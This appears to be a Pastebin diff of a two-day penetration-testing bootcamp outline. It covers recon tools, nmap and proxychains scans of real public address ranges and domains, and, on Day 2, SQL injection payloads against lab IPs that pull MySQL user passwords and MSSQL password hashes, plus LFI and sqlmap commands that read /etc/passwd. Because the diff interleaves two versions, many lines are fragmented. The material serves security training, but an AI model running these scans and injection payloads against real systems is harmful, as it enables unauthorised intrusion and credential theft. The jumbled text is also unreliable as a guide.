View difference between Paste ID: <a href="/hGkxTqV6">hGkxTqV6</a> and <a href="/4EEeEnXe">4EEeEnXe</a> - Pastebin.com

View difference between Paste ID: hGkxTqV6 and 4EEeEnXe

SHOW: | | - or go back to the newest paste.

1		########################################
2	-	# Ultimate Penetration Testing #
2	+	# Pentesting 2-Day Bootcamp #
3		# By Joe McCray of Strategic Security #
4		########################################
5
6
7
8		#############################
9	-	# Class Virtual Machine #
9	+	# Here are the class videos #
10		#############################
11		Day 1: Class video
12		https://s3.amazonaws.com/StrategicSec-Videos/2016/NovemberBundle/2016-11-21+09.28+Pentester+2-Day+Bootcamp+2016.mp4
13
14		Day 2: Class video
15	-	https://s3-us-west-2.amazonaws.com/infosecaddicts/InfoSecAddictsVM.zip
15	+
16	-	user: infosecaddicts
16	+
17	-	pass: infosecaddicts
17	+
18
19		Here is the VMWare virtual machine for the class:
20
21		https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu-v3.zip
22
23		user: strategicsec
24	-	# Day 1: OSINT #
24	+
25		pass: strategicsec
26	-	OK - it's time to get rollin!!!!!! I know that you are probably ready to scan the entire planet but I want you to do some Open Source Intelligence (OSINT) first.
26	+
27	-	Here is an an OSINT report that I did for a customer of mine a few years ago:
27	+
28	-	https://s3.amazonaws.com/infosecaddicts-Files/OSINT_Innophos_11242010.doc
28	+
29
30	-	Let's see if you can do a better one than me....
30	+
31		################
32		# Day 1: Recon #
33	-	Here are a few places to start:
33	+
34
35	-	- Wikipedia Page
35	+
36	-	- Are they Public or Private?
36	+
37	-	- Does the target have any subsidiaries?
37	+
38		cd ~/toolz/
39	-	- Robtex
39	+
40	-	- Show system map
40	+
41
42	-	- Netcraft
42	+	sudo apt-get install -y python-pyasn1 python-pyasn1-modules
43	-	- http://toolbar.netcraft.com/site_report
43	+
44		git clone https://github.com/laramies/theHarvester.git
45	-	- Passive Recon (Firefox Add-on)
45	+
46		cd theHarvester/
47
48		python theHarvester.py
49
50	-	Your first task:
50	+
51
52	-	Use the OSINT_Innophos doc as a reference and perform/document an OSINT assessment against any one of the following companies:
52	+
53	-	NSA
53	+
54	-	HSBC
54	+
55	-	Coke
55	+
56	-	Exxon Mobil
56	+
57	-	KPMG
57	+
58	-	Accenture
58	+
59	-	NewYork-Presbyterian Hospital
59	+
60	-	Kroger
60	+
61	-	Dillard's
61	+
62	-	Royal Caribbean International
62	+
63		-------------------------
64		cd ~/toolz/
65
66	-	Tools that are good for OSINT:
66	+	sudo apt-get install -y python-pip
67	-	------------------------------
67	+	strategicsec
68	-	Here are some tools that I think you should consider using for this challenge:
68	+
69	-	FOCA
69	+
70	-	Maltego
70	+	strategicsec
71	-	Search Diggity
71	+
72	-	ShodanHQ
72	+
73	-	PassiveRecon
73	+
74	-	EDGAR
74	+
75	-	theHarvester
75	+
76	-	gxfr.py
76	+
77	-	VisualRoute
77	+
78
79
80
81
82
83	-	******************************** Begin Day 1 Homework Part 1 ********************************
83	+
84	-	NOTE: Creating this OSINT Report IS AN ABSOLUTE REQUIREMENT FOR YOUR CPE CREDITS
84	+
85
86		-d : I used another domain name aside from Google.com to make it work
87	-	You must create a MS WORD document titled 'FirstName-LastName-Ultimate-Pentesting-Day1-OSINT-Report.docx' (ex: Joseph-McCray-Ultimate-Pentesting-Day1-OSINT-Report.docx).
87	+
88		-l : I limited the search result to 100 to make the process faster
89		-n : I limited the downloads (files that are going to be downloaded to get their metadatas extracted) to only 3 to make the process faster
90		-o : I directed the result of the compilation t motorolafiles, which is a file located inside the metagoofil directory (~/toolz/metagoofil/motorolafiles)
91		-f : Save the html links to html_links_<TIMESTAMP>.txt file
92	-	Your homework must be submitted via email to both (joe@strategicsec.com and gayane@strategicsec.com) by Sunday January 8th at midnight EST.
92	+
93
94
95	-	******************************** End Day 1 Homework Part 1 ********************************
95	+
96
97
98		Github Info Harvesting
99		----------------------
100		cd ~/toolz/
101
102		sudo pip install gitem
103		strategicsec
104
105		gitem organization facebook
106
107	-	sudo apt install -y python-pyasn1 python-pyasn1-modules
107	+
108	-	infosecaddicts
108	+
109
110
111		gitem --processes 4 user zpao
112
113
114
115
116		Network Topology Enumeration
117		----------------------------
118
119		cd ~/toolz/
120
121		wget https://raw.githubusercontent.com/leonteale/pentestpackage/master/gxfr.py
122
123		python gxfr.py --bxfr --dns-lookup -o
124		motorola.com
125		[ press enter ]
126		cw1kxyUgMdkECBNMb1fGqKJ9sC1lznaR20fPJeIt45Y=
127
128
129
130
131		cd ~/toolz/
132	-	sudo apt install -y python-pip
132	+
133	-	infosecaddicts
133	+	sudo rm -rf fierce2/
134		strategicsec
135
136	-	infosecaddicts
136	+
137
138		cd fierce
139
140		sudo apt-get install -y python3-pip
141		strategicsec
142
143		sudo pip3 install -r requirements.txt
144		strategicsec
145	-	exiftool -r *.doc \| egrep -i "Author\|Creator\|Email\|Producer\|Template" \| sort -u
145	+
146		python3 fierce.py -h
147
148		python3 fierce.py --domain facebook.com --subdomains accounts admin ads
149		Traverse IPs near discovered domains to search for contiguous blocks with the --traverse flag:
150
151		python3 fierce.py --domain facebook.com --subdomains admin --traverse 10
152
153
154		Limit nearby IP traversal to certain domains with the --search flag:
155
156		python3 fierce.py --domain facebook.com --subdomains admin --search fb.com fb.net
157
158
159		Attempt an HTTP connection on domains discovered with the --connect flag:
160
161		python3 fierce.py --domain stackoverflow.com --subdomains mail --connect
162
163
164
165
166
167		Find Web Servers
168		---------------
169
170		cd ~/toolz/
171	-	infosecaddicts
171	+
172		for i in $(seq 1 254); do echo "144.188.128.$i" >> motorola-IPs.txt; done
173
174
175
176		wget https://raw.githubusercontent.com/leonteale/pentestpackage/master/web-service-finder.sh
177
178		sh web-service-finder.sh motorola-IPs.txt
179
180
181
182
183
184
185		Recon-NG (Metasploit for Recon):
186		--------------------------------
187		cd ~/toolz/
188
189		sudo apt-get install -y git python-pip python-dnspython python-mechanize python-slowaes python-xlsxwriter python-jsonrpclib python-lxml
190		strategicsec
191
192		sudo pip install dicttoxml
193		strategicsec
194
195
196
197		git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git
198		cd recon-ng
199		./recon-ng
200
201	-	rm -rf fierce2/
201	+
202
203		At the prompt, let's type help in order to look at the commands we can use in Recon-ng.
204
205		recon-ng > help
206
207	-	sudo apt install -y python3-pip
207	+
208	-	infosecaddicts
208	+
209
210		recon-ng > [ TAB ] [ TAB ]
211
212
213
214	-	python3 fierce.py --domain motorola.com --subdomains accounts admin ads
214	+
215
216		recon-ng > show [ TAB ] [ TAB ]
217
218
219
220		Ok, let's drive this thing....
221
222		recon-ng > show banner
223
224		recon-ng > show companies
225
226		recon-ng > show contacts
227
228		recon-ng > show credentials
229
230		recon-ng > show dashboard
231
232		recon-ng > show domains
233
234		recon-ng > show hosts
235
236		recon-ng > show keys
237
238	-	sudo apt install -y git python-pip python-dnspython python-mechanize python-slowaes python-xlsxwriter python-jsonrpclib python-lxml
238	+
239	-	infosecaddicts
239	+
240		recon-ng > show locations
241
242	-	infosecaddicts
242	+
243
244		recon-ng > show netblocks
245
246		recon-ng > show options
247
248		recon-ng > show ports
249
250		recon-ng > show profiles
251
252		recon-ng > show pushpins
253
254		recon-ng > show repositories
255
256		recon-ng > show schema
257
258		recon-ng > show vulnerabilities
259
260		recon-ng > show workspaces
261
262
263
264
265
266		When you have found a module that you would like to try the process is fairly straight forward.
267
268		Type, “use [Modulename]” to use the module
269
270		Type, “show info” to view information about the module
271
272		And then, “show options” to see what variables can be set
273
274		Set the option variables with “set [variable]”
275
276		Finally, type “run” to execute the module
277
278
279
280
281
282
283		******************************** Begin Day 1 Homework ********************************
284		NOTE: THIS IS AN ABSOLUTE REQUIREMENT FOR YOUR CPE CREDITS
285
286
287		You must take screenshots of the process of you registering at least 5 API keys, as well as screenshots of you using at least 10 Recon-NG modules against a target company.
288
289
290		You must create a MS WORD document titled 'FirstName-LastName-Pentester-Bootcamp-Day1-Recon-NG.docx' (ex: Joseph-McCray-Pentester-Bootcamp-Day1-Recon-NG.docx).
291
292		You must spell you name EXACTLY as you want it spelled on your class certificate.
293
294
295		Reference links:
296		http://null-byte.wonderhowto.com/how-to/hack-like-pro-reconnaissance-with-recon-ng-part-1-getting-started-0169854/
297		http://resources.infosecinstitute.com/basic-updated-guide-to-recon-ng-plus-new-modules-rundown/
298
299		IMPORTANT NOTE:
300		Your homework must be submitted via email to both (joe@strategicsec.com and kasheia@strategicsec.com) by Sunday November 27th at midnight EST.
301
302		******************************** End Day 1 Homework ********************************
303
304
305
306
307		########################
308		# Scanning Methodology #
309		########################
310
311		- Ping Sweep
312		What's alive?
313		------------
314		sudo nmap -sP 157.166.226.*
315		strategicsec
316
317		-if -SP yields no results try:
318		sudo nmap -sL 157.166.226.*
319		strategicsec
320
321		sudo nmap -sL 157.166.226.* \| grep com
322		strategicsec
323
324		- Port Scan
325		What's where?
326		------------
327		sudo nmap -sS 162.243.126.247
328		strategicsec
329
330
331		- Bannergrab/Version Query
332		What versions of software are running
333		-------------------------------------
334		sudo nmap -sV 162.243.126.247
335		strategicsec
336
337
338		- Vulnerability Research
339	-	You must create a MS WORD document titled 'FirstName-LastName-Pentester-Ultimate-Pentesting-Day1-Recon-NG.docx' (ex: Joseph-McCray-Ultimate-Pentesting-Day1-Recon-NG.docx).
339	+
340		----------------------------------------------
341		http://exploit-db.com
342		http://securityfocus.com/bid
343		https://packetstormsecurity.com/files/tags/exploit/
344
345
346
347		#######################################################
348		# Day 1: 3rd Party Scanning, and scanning via proxies #
349	-	Your homework must be submitted via email to both (joe@strategicsec.com and gayane@strategicsec.com) by Sunday January 8th at midnight EST.
349	+
350
351		https://www.shodan.io/
352
353		Create a FREE account and login
354
355		net:129.188.8.0/24
356
357
358
359		cd /home/strategicsec/toolz/
360		perl proxyfinder-0.3.pl multiproxy 3 proxies.txt <-- This takes a long time to run
361
362
363
364	-	infosecaddicts
364	+
365		strategicsec
366
367
368
369	-	infosecaddicts
369	+
370		----------------------------------------------------------------------
371		vi ~/toolz/fix-proxychains-dns.sh
372	-	infosecaddicts
372	+
373		#!/bin/bash
374		# This script is called by proxychains to resolve DNS names
375		# DNS server used to resolve names
376		# Reference: http://carnal0wnage.attackresearch.com/2013/09/changing-proxychains-hardcoded-dns.html
377		DNS_SERVER=4.2.2.2
378	-	infosecaddicts
378	+
379		if [ $# = 0 ] ; then
380		echo " usage:"
381		echo " proxyresolv <hostname> "
382		exit
383		fi
384
385	-	infosecaddicts
385	+
386		dig $1 @$DNS_SERVER +tcp \| awk '/A.+[0-9]+\.[0-9]+\.[0-9]/{print $5;}'
387		-----------------------------------------------------------------------
388
389
390		sudo ntpdate pool.ntp.org
391		strategicsec
392
393		tor-resolve strategicsec.com
394
395		proxychains nmap -sT -p80 162.243.126.247
396
397		proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,445,1433,1521,3306,3389,8080,10000 162.243.126.247
398
399
400
401
402
403
404
405		#########################
406		# Playing with Nmap NSE #
407		#########################
408
409	-	cd /home/infosecaddicts/toolz/
409	+	nmap -Pn -p80 --script ip-geolocation-* strategicsec.com
410
411		nmap -p80 --script dns-brute strategicsec.com
412
413		nmap --script http-robtex-reverse-ip secore.info
414
415	-	infosecaddicts
415	+	nmap -Pn -p80 --script=http-headers strategicsec.com
416
417
418		ls /usr/share/nmap/scripts \| grep http
419		nmap -Pn -p80 --script=http-* strategicsec.com
420
421
422
423
424		#####################################
425		# Writing Your Own Nmap NSE Scripts #
426		#####################################
427
428
429		----------------------------------------------------------------------
430		sudo vi /usr/share/nmap/scripts/intro-nse.nse
431
432		-- The Head Section --
433		-- The Rule Section --
434		portrule = function(host, port)
435		return port.protocol == "tcp"
436		and port.number == 80
437		and port.state == "open"
438		end
439
440		-- The Action Section --
441	-	infosecaddicts
441	+
442		return "Pentester Bootcamp!"
443	-	tor-resolve infosecaddicts.com
443	+
444		----------------------------------------------------------------------
445
446		- Ok, now that we've made that change let's run the script
447		sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse strategicsec.com -p 22,80,443
448
449
450
451
452
453
454		----------------------------------------------------------------------
455		sudo vi /usr/share/nmap/scripts/intro-nse.nse
456
457		-- The Head Section --
458		local shortport = require "shortport"
459	-	nmap -Pn -p80 --script ip-geolocation-* infosecaddicts.com
459	+
460		-- The Rule Section --
461	-	nmap -p80 --script dns-brute infosecaddicts.com
461	+
462
463
464		-- The Action Section --
465	-	nmap -Pn -p80 --script=http-headers infosecaddicts.com
465	+
466		return "Pentester Bootcamp!"
467		end
468		----------------------------------------------------------------------
469	-	nmap -Pn -p80 --script=http-* infosecaddicts.com
469	+
470		- Ok, now that we've made that change let's run the script
471		sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse strategicsec.com -p 22,80,443
472
473
474
475
476
477
478
479		OK, now let's have some fun with my buddy Carlos Perez's website which you should have been looking at quite a lot if you were trying to get Ruby 2.1.5 working last year.
480
481		----------------------------------------------------------------------
482		sudo vi /usr/share/nmap/scripts/intro-nse.nse
483
484		-- The Head Section --
485		local shortport = require "shortport"
486		local http = require "http"
487
488		-- The Rule Section --
489		portrule = shortport.http
490
491		-- The Action Section --
492	-	return "Ultimate Pentesting!"
492	+
493
494		local uri = "/installing-metasploit-in-ubunt/"
495		local response = http.get(host, port, uri)
496		return response.status
497	-	sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443
497	+
498		end
499		----------------------------------------------------------------------
500
501		- Ok, now that we've made that change let's run the script
502		sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
503
504
505
506
507		----------------------------------------------------------------------
508		sudo vi /usr/share/nmap/scripts/intro-nse.nse
509
510		-- The Head Section --
511		local shortport = require "shortport"
512		local http = require "http"
513
514		-- The Rule Section --
515		portrule = shortport.http
516	-	return "Ultimate Pentesting!"
516	+
517		-- The Action Section --
518		action = function(host, port)
519
520		local uri = "/installing-metasploit-in-ubunt/"
521	-	sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443
521	+
522
523		if ( response.status == 200 ) then
524		return response.body
525		end
526
527		end
528		----------------------------------------------------------------------
529
530		- Ok, now that we've made that change let's run the script
531		sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
532
533
534
535
536
537
538
539
540
541		----------------------------------------------------------------------
542		sudo vi /usr/share/nmap/scripts/intro-nse.nse
543
544		-- The Head Section --
545		local shortport = require "shortport"
546		local http = require "http"
547		local string = require "string"
548
549		-- The Rule Section --
550		portrule = shortport.http
551
552		-- The Action Section --
553		action = function(host, port)
554
555		local uri = "/installing-metasploit-in-ubunt/"
556		local response = http.get(host, port, uri)
557
558		if ( response.status == 200 ) then
559		local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
560		return title
561		end
562
563		end
564		----------------------------------------------------------------------
565
566		- Ok, now that we've made that change let's run the script
567		sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
568
569
570
571
572
573
574
575		----------------------------------------------------------------------
576		sudo vi /usr/share/nmap/scripts/intro-nse.nse
577
578		-- The Head Section --
579		local shortport = require "shortport"
580		local http = require "http"
581		local string = require "string"
582
583		-- The Rule Section --
584		portrule = shortport.http
585
586		-- The Action Section --
587		action = function(host, port)
588
589		local uri = "/installing-metasploit-in-ubunt/"
590		local response = http.get(host, port, uri)
591
592		if ( response.status == 200 ) then
593		local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
594
595		if (title) then
596		return "Vulnerable"
597		else
598		return "Not Vulnerable"
599		end
600		end
601		end
602
603		----------------------------------------------------------------------
604
605		- Ok, now that we've made that change let's run the script
606		sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
607
608
609
610		******************************** Begin Day 1 Homework Part 2 ********************************
611		NOTE: THIS IS AN ABSOLUTE REQUIREMENT FOR YOUR CPE CREDITS
612
613		You must take screenshots of you performing all of the scanning tasks that we have done so far today
614
615		You must create a MS WORD document titled 'FirstName-LastName-Pentester-Bootcamp-Day1-Adv-Scanning.docx' (ex: Joseph-McCray-Pentester-Bootcamp-Day1-Adv-Scanning.docx).
616
617		You must spell you name EXACTLY as you want it spelled on your class certificate.
618
619		IMPORTANT NOTE:
620		Your homework must be submitted via email to both (joe@strategicsec.com and kasheia@strategicsec.com) by Sunday November 27th at midnight EST.
621
622		******************************** End Day 1 Homework Part 2 ********************************
623
624
625
626
627
628
629
630
631
632
633		##########################
634		# Day 2: Web App Testing #
635		##########################
636
637
638
639
640
641		#######################
642		# Attacking PHP/MySQL #
643		#######################
644
645		Go to LAMP Target homepage
646		http://54.172.112.249/
647
648
649
650		Clicking on the Acer Link:
651		http://54.172.112.249/acre2.php?lap=acer
652
653		- Found parameter passing (answer yes to question 1)
654		- Insert ' to test for SQLI
655
656		http://54.172.112.249/acre2.php?lap=acer'
657
658
659		Page returns the following error:
660	-	******************************** Begin Day 1 Homework Part 3 ********************************
660	+
661
662
663
664		In order to perform union-based sql injection - we must first determine the number of columns in this query.
665	-	You must create a MS WORD document titled 'FirstName-LastName-Pentester-Ultimate-Pentesting-Day1-Adv-Scanning.docx' (ex: Joseph-McCray-Ultimate-Pentesting-Day1-Adv-Scanning.docx).
665	+
666		http://54.172.112.249/acre2.php?lap=acer' order by 100-- +
667
668		Page returns the following error:
669		Unknown column '100' in 'order clause'
670	-	Your homework must be submitted via email to both (joe@strategicsec.com and gayane@strategicsec.com) by Sunday January 8th at midnight EST.
670	+
671
672	-	******************************** End Day 1 Homework Part 3 ********************************
672	+
673		http://54.172.112.249/acre2.php?lap=acer' order by 50-- +
674
675		Page returns the following error:
676		Unknown column '50' in 'order clause'
677
678
679
680		http://54.172.112.249/acre2.php?lap=acer' order by 25-- +
681		Page returns the following error:
682		Unknown column '25' in 'order clause'
683	-	##########
683	+
684	-	# Day 2: #
684	+
685	-	##########
685	+
686		http://54.172.112.249/acre2.php?lap=acer' order by 12-- +
687	-	-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
687	+
688	-	Let's have you connect to the VPN. I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack.
688	+
689	-	If I attack the live targets in the lab then I'll end up giving away a lot of the little secrets that I want you to discover.
689	+
690
691	-	So, let's start with some lab fun (just a little bit)...lol. Here are the instructions for connecting to the VPN:
691	+
692	-	https://s3.amazonaws.com/infosecaddicts-Files/Strategic-Security-2016-VPN-Info.pdf
692	+
693		http://54.172.112.249/acre2.php?lap=acer' order by 6-- +
694	-	sudo nmap -sP 10.0.0.0/24
694	+
695	-	infosecaddicts
695	+
696
697	-	sudo nmap -sL 10.0.0.0/24
697	+
698	-	infosecaddicts
698	+
699
700	-	cd ~/toolz
700	+
701		http://www.techonthenet.com/sql/union.php
702	-	wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c
702	+
703
704	-	gcc ipcrawl.c -o ipcrawl
704	+
705		http://54.172.112.249/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +
706	-	chmod 777 ipcrawl
706	+
707
708	-	./ipcrawl 10.0.0.1 10.0.0.254
708	+
709		Now we negate the parameter value 'acer' by turning into the word 'null':
710		http://54.172.112.249/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j
711
712	-	wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
712	+
713
714	-	gcc propecia.c -o propecia
714	+
715		Use a cheat sheet for syntax:
716	-	sudo cp propecia /bin
716	+
717	-	infosecaddicts
717	+
718
719	-	propecia 10.0.0 22
719	+
720
721	-	propecia 10.0.0 3389
721	+
722
723	-	nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* \| grep open
723	+
724
725	-	nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* \| awk '/open/{print $2 " " $3}'
725	+
726
727	-	nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* \| awk '/open/{print $2}' \| wc -l
727	+
728		http://54.172.112.249/acre2.php?lap=null' union all select 1,2,3,user,password,6 from mysql.user -- a
729	-	nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* \| awk '/open/{print $2}'
729	+
730
731	-	nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* \| awk '/open/{print $2}' > ~/labnet-ip-list.txt
731	+
732
733	-	#################################################
733	+
734	-	# Screenshotting the Web Servers in the Network #
734	+
735	-	#################################################
735	+
736
737	-	mkdir labscreenshots
737	+
738	-	cd labscreenshots/
738	+
739		http://54.172.112.249/showfile.php?filename=/etc/passwd
740
741	-	wget http://download.gna.org/wkhtmltopdf/0.12/0.12.4/wkhtmltox-0.12.4_linux-generic-amd64.tar.xz
741	+
742	-	tar xf wkhtmltox-0.12.4_linux-generic-amd64.tar.xz
742	+
743	-	cd wkhtmltox/bin/
743	+
744	-	sudo cp wkhtmltoimage /usr/local/bin/wkhtmltoimage-i386
744	+
745
746
747		Now let's append that URL to our LFI and instead of it being Local - it is now a Remote File Include or RFI:
748	-	git clone git://github.com/SpiderLabs/Nmap-Tools.git
748	+
749	-	cd Nmap-Tools/NSE/
749	+
750	-	sudo cp http-screenshot.nse /usr/share/nmap/scripts/
750	+
751	-	infosecaddicts
751	+	-----------------Some Automated Testing from the strategicsec VM-----------------
752
753	-	sudo nmap --script-updatedb
753	+
754	-	infosecaddicts
754	+
755		##################################################
756		https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu-v3.zip
757	-	cd ~/toolz/labscreenshots/
757	+	user: strategicsec
758	-	sudo nmap -Pn -T 5 -p 80 -A --script=http-screenshot 10.0.0.0/24 -iL /home/infosecaddicts/labnet-ip-list.txt
758	+	pass: strategicsec
759	-	infosecaddicts
759	+
760
761
762		cd /home/strategicsec/toolz/sqlmap-dev/
763
764	-	vi screenshots.sh
764	+
765
766
767	-	printf "<HTML><BODY><BR>" > labnet-port-80-screenshots.html
767	+
768	-	ls -1 *.png \| awk -F : '{ print $1":"$2"\n<BR><IMG SRC=\""$1"%3A"$2"\" width=400><BR><BR>"}' >> labnet-port-80-screenshots.html
768	+
769	-	printf "</BODY></HTML>" >> labnet-port-80-screenshots.html
769	+
770		python sqlmap.py -u "http://54.172.112.249/acre2.php?lap=acer" --current-db -v 3
771
772
773		python sqlmap.py -u "http://54.172.112.249/acre2.php?lap=acer" --privileges -v 3
774
775	-	sh screenshots.sh
775	+
776		python sqlmap.py -u "http://54.172.112.249/acre2.php?lap=acer" --dbs -v 3
777
778
779		python sqlmap.py -u "http://54.172.112.249/acre2.php?lap=acer" --tables -v 3
780
781	-	# Nmap NSE tricks to try #
781	+
782		python sqlmap.py -u "http://54.172.112.249/acre2.php?lap=acer" --file-read=/etc/issue -v 3
783	-	sudo nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.0/24
783	+
784	-	infosecaddicts
784	+
785		python sqlmap.py -u "http://54.172.112.249/acre2.php?lap=acer" --file-read=/etc/passwd -v 3
786	-	sudo nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos 10.0.0.0/24
786	+
787	-	infosecaddicts
787	+
788
789	-	sudo nmap -Pn -n -sU --open -p53 --script=dns-blacklist,dns-cache-snoop,dns-nsec-enum,dns-nsid,dns-random-srcport,dns-random-txid,dns-recursion,dns-service-discovery,dns-update,dns-zeustracker,dns-zone-transfer 10.0.0.0/24
789	+
790	-	infosecaddicts
790	+
791		#############################
792	-	sudo nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 10.0.0.0/24
792	+
793	-	infosecaddicts
793	+
794		http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
795	-	sudo nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect 10.0.0.0/24
795	+	http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
796	-	infosecaddicts
796	+	http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
797		http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
798	-	sudo nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info 10.0.0.0/24
798	+	http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
799	-	infosecaddicts
799	+	http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases
800		http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
801	-	sudo nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt 10.0.0.0/24
801	+	http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
802	-	infosecaddicts
802	+	http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
803
804	-	sudo nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables 10.0.0.0/24
804	+
805	-	infosecaddicts
805	+
806
807	-	sudo nmap -Pn -n --open -p3389 --script=rdp-vuln-ms12-020,rdp-enum-encryption 10.0.0.0/24
807	+
808	-	infosecaddicts
808	+
809		#############################
810	-	sudo nmap -Pn -n --open -p5900 --script=realvnc-auth-bypass,vnc-info 10.0.0.0/24
810	+	http://54.213.252.28/bookdetail.aspx?id=2 order by 100--
811	-	infosecaddicts
811	+	http://54.213.252.28/bookdetail.aspx?id=2 order by 50--
812		http://54.213.252.28/bookdetail.aspx?id=2 order by 25--
813	-	sudo nmap -Pn -n --open -p6000-6005 --script=x11-access 10.0.0.0/24
813	+	http://54.213.252.28/bookdetail.aspx?id=2 order by 10--
814	-	infosecaddicts
814	+	http://54.213.252.28/bookdetail.aspx?id=2 order by 5--
815		http://54.213.252.28/bookdetail.aspx?id=2 order by 6--
816	-	sudo nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info 10.0.0.0/24
816	+	http://54.213.252.28/bookdetail.aspx?id=2 order by 7--
817	-	infosecaddicts
817	+	http://54.213.252.28/bookdetail.aspx?id=2 order by 8--
818		http://54.213.252.28/bookdetail.aspx?id=2 order by 9--
819		http://54.213.252.28/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
820	-	sudo nmap -sV -oA nse --script-args=unsafe=1 --script-args=unsafe --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" 10.0.0.0/24
820	+
821	-	infosecaddicts
821	+	We are using a union select statement because we are joining the developer's query with one of our own.
822		Reference:
823		http://www.techonthenet.com/sql/union.php
824		The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
825		It removes duplicate rows between the various SELECT statements.
826
827		Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
828
829		http://54.213.252.28/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
830	-	##########
830	+
831	-	# Day 3: #
831	+	Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
832	-	##########
832	+
833		http://54.213.252.28/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
834	-	mkdir ~/toolz/wordlists
834	+	http://54.213.252.28/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
835	-	cd ~/toolz/wordlists
835	+	http://54.213.252.28/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
836	-	echo dbo >> users.txt
836	+	http://54.213.252.28/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
837	-	echo sa >> users.txt
837	+
838	-	echo admin >> users.txt
838	+
839	-	echo root >> users.txt
839	+
840	-	echo password >> pass.txt
840	+
841	-	echo pass >> pass.txt
841	+
842	-	echo hello >> pass.txt
842	+
843	-	echo goodbye >> pass.txt
843	+	http://54.213.252.28/bookdetail.aspx?id=(2)
844	-	echo test >> pass.txt
844	+	http://54.213.252.28/bookdetail.aspx?id=(4-2)
845	-	echo admin >> pass.txt
845	+	http://54.213.252.28/bookdetail.aspx?id=(4-1)
846	-	echo db >> pass.txt
846	+
847	-	echo god >> pass.txt
847	+
848	-	echo 123 >> pass.txt
848	+
849	-	echo letmein >> pass.txt
849	+	http://54.213.252.28/bookdetail.aspx?id=2 or 1=1--
850		http://54.213.252.28/bookdetail.aspx?id=2 or 1=2--
851		http://54.213.252.28/bookdetail.aspx?id=1*1
852		http://54.213.252.28/bookdetail.aspx?id=2 or 1 >-1#
853		http://54.213.252.28/bookdetail.aspx?id=2 or 1<99#
854		http://54.213.252.28/bookdetail.aspx?id=2 or 1<>1#
855		http://54.213.252.28/bookdetail.aspx?id=2 or 2 != 3--
856		http://54.213.252.28/bookdetail.aspx?id=2 &0#
857	-	# Attacking Databases #
857	+
858
859	-	Attacking MySQL with Metasploit
859	+
860
861	-	cd ~/toolz/metasploit
